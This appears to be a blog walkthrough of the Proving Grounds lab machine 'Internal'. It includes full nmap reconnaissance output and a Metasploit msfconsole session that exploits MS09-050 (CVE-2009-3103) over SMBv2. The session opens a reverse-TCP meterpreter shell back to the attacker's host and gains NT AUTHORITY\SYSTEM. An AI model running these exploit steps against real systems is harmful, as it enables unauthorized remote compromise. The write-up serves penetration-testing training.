PG - Internal

Exploiting MS09-050 (CVE-2009-3103) on port 5357 using Metasploit to achieve remote code execution via a crafted SMBv2 request to gain NT AUTHORITY\SYSTEM.

Posted Aug 11, 2025

By 0xdagg3r

4 min read

PG - Internal

Recon

nmap discovers few open ports

sudo nmap -Pn -sS -sC -sV -T4 -vvv -p- "$TARGET"

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  syn-ack ttl 125 Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Service
| rdp-ntlm-info:
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2025-03-07T11:44:35+00:00
|_ssl-date: 2025-03-07T11:44:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=internal
| Issuer: commonName=internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-01-05T19:52:51
| Not valid after:  2025-07-07T19:52:51
| MD5:   7c2b:85a9:1fe2:c264:4be8:ed3e:e16b:274a
| SHA-1: 05e9:c5e9:7ac6:242e:0a18:ca56:e1b5:1c38:31db:d393
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQFHV8TrpYYLdKV58423mJ8zANBgkqhkiG9w0BAQUFADAT
| MREwDwYDVQQDEwhpbnRlcm5hbDAeFw0yNTAxMDUxOTUyNTFaFw0yNTA3MDcxOTUy
| NTFaMBMxETAPBgNVBAMTCGludGVybmFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAsuNdIa0z31V1iHCg2TtuOK+FoyVu3aXcVxL/Q8jUvhOtpe0fWn9j
| qpT+smMeA0XpJfeS917Tpy5t5gqyqUCAXPOwoeGnZu1IrvxwcMlpMImPGXeMZ+0q
| Cb/3LdlwA7WEUaZtAxpMHBx7UNbcEnj38BsrWY6zr/K7TDlFgsrsITDDuyddIjNz
| 2VU8gFBPPwzHZGMGsMgo2v3mCZnA6Xkp8tmwGq137fxrwbvzC3vNdt1/m5icsyYD
| hMglYmztE9vp0rwKB0CB5K+mwc9U7isWsRbORWutqkBbp4XI08RbSklP3A6XPUNu
| eUb1rIMV4ZbTbRTOKOGa12X7isXq6cVzOwIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAE0duqOsApBP
| OvE8znZxfUgAF5f+WR+GsAPYwhV0c6GWv7PnghnTAFfoBy+8Gy1PeyrAwfL2PQqT
| AHIBgpfbkEWwA/idfGpTJNDF2n8uZ3W8hOBU7elqRAHtvj749IqnMz15n5WwsGvW
| A6hsOIoEKyluekiV9kOosMjKG9jtB+iwOe88L5EqHrEfPeml2mpvhH6VhvJZnXlJ
| 1l0/GDRRXslgyBir672iqHy25PNqJQYlEMSooxZCwKUpo345E4J6BIxeayvNeLca
| W+SKB84s3A/9pXnPEXLD7IT6I4ln9ZQeYXHK0n3U2LcSCt8JtEr1vfi4LMSboxxi
| lRXQzPUUSW8=
|_-----END CERTIFICATE-----
5357/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
49152/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49156/tcp open  unknown       syn-ack ttl 125
49157/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 1h35m59s, deviation: 3h34m40s, median: 0s
| smb2-security-mode:
|   2:0:2:
|_    Message signing enabled but not required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 38386/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 28118/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54232/udp): CLEAN (Timeout)
|   Check 4 (port 64884/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:7c:45 (VMware)
| Names:
|   INTERNAL<00>         Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   INTERNAL<20>         Flags: <unique><active>
| Statistics:
|   00:50:56:ab:7c:45:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-07T03:44:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-03-07T11:44:34
|_  start_date: 2025-02-20T21:30:47

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.03 seconds
           Raw packets sent: 1054 (46.376KB) | Rcvd: 1012 (40.532KB)

There is Null Session in SMB but no available shares

Port 5357 is running on HTTP. Visited the site but returned error

Service unavailable

I’ll look for what port 5357 is as this is an uncommon port

Info on port 5357

Looks like this is Windows related service.

Next I’ll looke for any exploits related to this port

WSDAPI exploit search

Discover that it may be vulnerable to MS09-063. I’ll continue searching.

potential exploit

This time I have a possible exploit from ExploitDB.

I have tried to run the exploit multiple times but it is very unreliable so I decided to look for another.

Search result of exploit

Exploitation

I’ll use this exploit from Metasploit.

Launch msfconsole

msf6 > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set rhosts 192.168.196.40
rhosts => 192.168.196.40
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lhost tun0
lhost => tun0
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.45.161:4444
[*] 192.168.196.40:445 - Connecting to the target (192.168.196.40:445)...
[*] 192.168.196.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.196.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (177734 bytes) to 192.168.196.40
[*] Meterpreter session 1 opened (192.168.45.161:4444 -> 192.168.196.40:49159) at 2025-08-07 09:45:41 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Using the Metasploit framework, I got shell as NT AUTHORITY\SYSTEM

Proving Grounds

windows public exploit search

This post is licensed under CC BY 4.0 by the author.

Recon

Exploitation

Trending Tags